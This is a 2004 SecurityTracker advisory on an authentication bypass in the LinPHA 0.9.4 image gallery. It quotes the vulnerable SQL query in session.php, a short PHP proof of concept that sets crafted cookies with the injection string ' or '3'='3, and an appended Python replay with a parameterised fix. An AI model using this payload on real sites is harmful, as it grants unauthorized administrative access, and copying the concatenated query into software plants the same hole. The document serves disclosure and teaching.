SecurityTracker.com
Category:  Application (Generic)  >  LinPHA
Vendors:  linpha.sourceforge.net
LinPHA Authentication Flaw Grants Administrative Access to Remote Users
SecurityTracker Alert ID:  1010813
SecurityTracker URL:  http://securitytracker.com/id?1010813
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jul 29 2004
Impact:  User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 0.9.4
Description:  A vulnerability was reported in the LinPHA image gallery software. A remote user can obtain administrative access to the application.

Ruban Molina and Fernando Quintero reported that a remote user can set specially crafted cookie values and then request the 'admin.php' script to be authenticated by it. If the 'linpha_userid' and 'linpha_password' cookies are set and have non-empty values, the remote user can gain access.

Impact:  A remote user can obtain administrative access on the application.
Solution:  The vendor has released a fix, available via CVS.
Vendor URL:  linpha.sourceforge.net/
Cause:  Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Ruban_Molina <ruben@udea.edu.co>
Message History:   None.


 Source Message Contents

Date:  Thu, 29 Jul 2004 20:48:12 +0700 (ICT)
From:  Ruban_Molina <ruben@udea.edu.co>
Subject:  Linpha 0.9.4: authentication bypass

 


/////////////////////////////////////////////////////
////    Vulnerable Program: Linpha
////
////    Url: http://linpha.sf.net
////
////    Version: 0.9.4 Latest version
////
////    Date: Today, July 28, 2004
////
////    Author: Fernando Quintero (a.k.a nonroot)
////    Email: nando@udea.edu.co
//////////////////////////////////////////////////////


  I. Affected software description:

  LinPHA is an easy to use, multilingual, flexible photo/image
  archive/album/gallery written in PHP.
  It uses a SQL database to store information about your pictures. It
  comes with an HTML-based installer, so you don't need experience in
  setting up a SQL DB.


  II. Bug

  There is a bug in the code that allows an attacker to bypass the
  authentication of the linpha admin.
  It can be done without a password: you only have to modify the
  cookies of the session, and then browse to the admin.php script.

  The bug is located approximately at [25] of the session.php file:

  1. SQL injection allows bypassing the auth

     // Read Cookie
     24 if(read_config('autologin')) {
     25     if(!isset($_SESSION['user_name']) && isset($_COOKIE["linpha_userid"]) && $_COOKIE["linpha_userid"]!="" && isset($_COOKIE["linpha_password"]) && $_COOKIE["linpha_password"]!="")
     26     {
     27         // both cookie values are concatenated into the SQL text without escaping
     27         $query_username = $GLOBALS['db']->Execute("SELECT nickname, level, groups FROM ".PREFIX."users ".
     28                 "WHERE ID = '".$_COOKIE["linpha_userid"]."' AND ".
     29                 "password = '".$_COOKIE["linpha_password"]."'");
     30
     31         if($row = $query_username->FetchRow())
     32         {
     33             $_SESSION["REMOTE_ADDR"] = @$_SERVER["REMOTE_ADDR"];
     34             $_SESSION["user_name"] = $row[0];
     35             $_SESSION["user_pass"] = $_COOKIE["linpha_password"];
     36             $_SESSION["user_level"] = $row[1];      // Store user level
     37             $_SESSION["user_groups"] = $row[2];     // Store user group membership
     38         }
     39         else    // wrong cookie
     40         {
     41             setcookie("linpha_userid");     // delete cookie linpha_userid
     42             setcookie("linpha_password");   // delete cookie linpha_password
     43         }
     44     }
     45 }

  There are two cookies that are validated: linpha_userid and
  linpha_password.

  So I could get in without a password if I inject those cookies.



  I wrote these lines in a test.php:

      <?PHP
      setcookie("linpha_userid","1",time()+86400*365,'/linpha');
      setcookie("linpha_password","' or '3'='3",time()+86400*365,'/linpha');
      ?>



  The script is loaded before the admin.php file; the new cookies will
  then inject into the query at [29].

  This is possible if the magic_quotes variable is set to Off in the
  php.ini.

  But in any case, these cookies should be checked before being used in the query.

  OK, that's it!



III. Solution

    The main coder was contacted and the code was fixed in the CVS ;).


IV.  Greetings

    - Greets to GIGAX people, especially Sandra195
    - Greets to all the community. I learn from you!

V.  Contact

    Fernando Quintero
    nando@udea.edu.co
    Medellín-Colombia

VI. Final words

    !!! Viva Colombia !!!!!!!!
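The cookie injection described in the source message, replayed beside its hardened form, as an added example that is neither part of the original advisory nor LinPHA's own code: a Python stand-in for the session.php query run against a constructed in-memory SQLite table (table and column names follow the advisory's query; that the stored password is an MD5 digest is an assumption made for this example).

```python
import hashlib
import sqlite3

# Constructed stand-in for the LinPHA users table. Column names follow the
# query quoted in the advisory; that the stored password is an MD5 digest is
# an assumption made for this example, not something verified against LinPHA.
ADMIN_HASH = hashlib.md5(b"123456").hexdigest()


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute('CREATE TABLE linpha_users (ID INTEGER, nickname TEXT, '
               'level INTEGER, "groups" TEXT, password TEXT)')
    db.execute("INSERT INTO linpha_users VALUES (?, ?, ?, ?, ?)",
               (1, "admin", 1, "admins", ADMIN_HASH))
    db.commit()
    return db


def autologin_vulnerable(db, userid, password):
    """Mirrors session.php lines 27-29: the cookie values are spliced into
    the SQL text, so a quote inside the password cookie rewrites the WHERE."""
    sql = ('SELECT nickname, level, "groups" FROM linpha_users '
           "WHERE ID = '" + userid + "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()


def autologin_fixed(db, userid, password):
    """Hardened form: bound parameters, so cookie content is only ever data
    and the same payload simply fails to match a row."""
    sql = ('SELECT nickname, level, "groups" FROM linpha_users '
           "WHERE ID = ? AND password = ?")
    return db.execute(sql, (userid, password)).fetchone()


def demo():
    """Replays the advisory's cookie pair against both query builders."""
    db = make_db()
    payload = "' or '3'='3"   # the linpha_password cookie set by test.php
    # AND binds tighter than OR, so the vulnerable WHERE becomes
    # (ID = '1' AND password = '') OR ('3' = '3'), which matches every row.
    return autologin_vulnerable(db, "1", payload), autologin_fixed(db, "1", payload)


if __name__ == "__main__":
    print(demo())   # (('admin', 1, 'admins'), None)
```

The parameterised query is the check the author asks for; in the real application the cookie should additionally carry a random session token rather than the password material itself.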

 


Copyright 2004, SecurityGlobal.net LLC